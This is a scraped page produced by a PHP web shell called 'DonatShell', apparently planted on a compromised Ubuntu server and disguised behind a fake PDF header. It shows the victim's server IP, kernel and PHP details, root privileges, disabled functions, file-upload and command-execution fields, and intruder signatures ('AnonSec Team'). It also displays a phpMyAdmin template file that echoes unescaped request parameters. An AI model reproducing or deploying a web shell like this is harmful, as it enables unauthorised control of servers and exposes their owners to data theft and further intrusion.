%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/phpmyadmin/templates/database/structure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/phpmyadmin/templates/database/structure/sortable_header.phtml
<?php
$requested_sort = 'table';
$requested_sort_order = $future_sort_order = $initial_sort_order;
// If the user requested a sort
if (isset($_REQUEST['sort'])) {
    $requested_sort = $_REQUEST['sort'];
    if (isset($_REQUEST['sort_order'])) {
        $requested_sort_order = $_REQUEST['sort_order'];
    }
}
$order_img = '';
$order_link_params = array();
$order_link_params['title'] = __('Sort');
// If this column was requested to be sorted.
if ($requested_sort == $sort) {
    if ($requested_sort_order == 'ASC') {
        $future_sort_order = 'DESC';
        // current sort order is ASC
        $order_img  = ' ' . PMA_Util::getImage(
            's_asc.png',
            __('Ascending'),
            array('class' => 'sort_arrow', 'title' => '')
        );
        $order_img .= ' ' . PMA_Util::getImage(
            's_desc.png',
             __('Descending'),
            array('class' => 'sort_arrow hide', 'title' => '')
        );
        // but on mouse over, show the reverse order (DESC)
        $order_link_params['onmouseover'] = "$('.sort_arrow').toggle();";
        // on mouse out, show current sort order (ASC)
        $order_link_params['onmouseout'] = "$('.sort_arrow').toggle();";
    } else {
        $future_sort_order = 'ASC';
        // current sort order is DESC
        $order_img  = ' ' . PMA_Util::getImage(
            's_asc.png',
            __('Ascending'),
            array('class' => 'sort_arrow hide', 'title' => '')
        );
        $order_img .= ' ' . PMA_Util::getImage(
            's_desc.png',
            __('Descending'),
            array('class' => 'sort_arrow', 'title' => '')
        );
        // but on mouse over, show the reverse order (ASC)
        $order_link_params['onmouseover'] = "$('.sort_arrow').toggle();";
        // on mouse out, show current sort order (DESC)
        $order_link_params['onmouseout'] = "$('.sort_arrow').toggle();";
    }
}
$_url_params = array(
    'db' => $_REQUEST['db'],
);
$url = 'db_structure.php' . PMA_URL_getCommon($_url_params);
// We set the position back to 0 every time they sort.
$url .= "&amp;pos=0&amp;sort=$sort&amp;sort_order=$future_sort_order";
if (! empty($_REQUEST['tbl_type'])) {
    $url .= "&amp;tbl_type=" . $_REQUEST['tbl_type'];
}
if (! empty($_REQUEST['tbl_group'])) {
    $url .= "&amp;tbl_group=" . $_REQUEST['tbl_group'];
}
echo PMA_Util::linkOrButton(
    $url, $title . $order_img, $order_link_params
);

Anon7 - 2022
AnonSec Team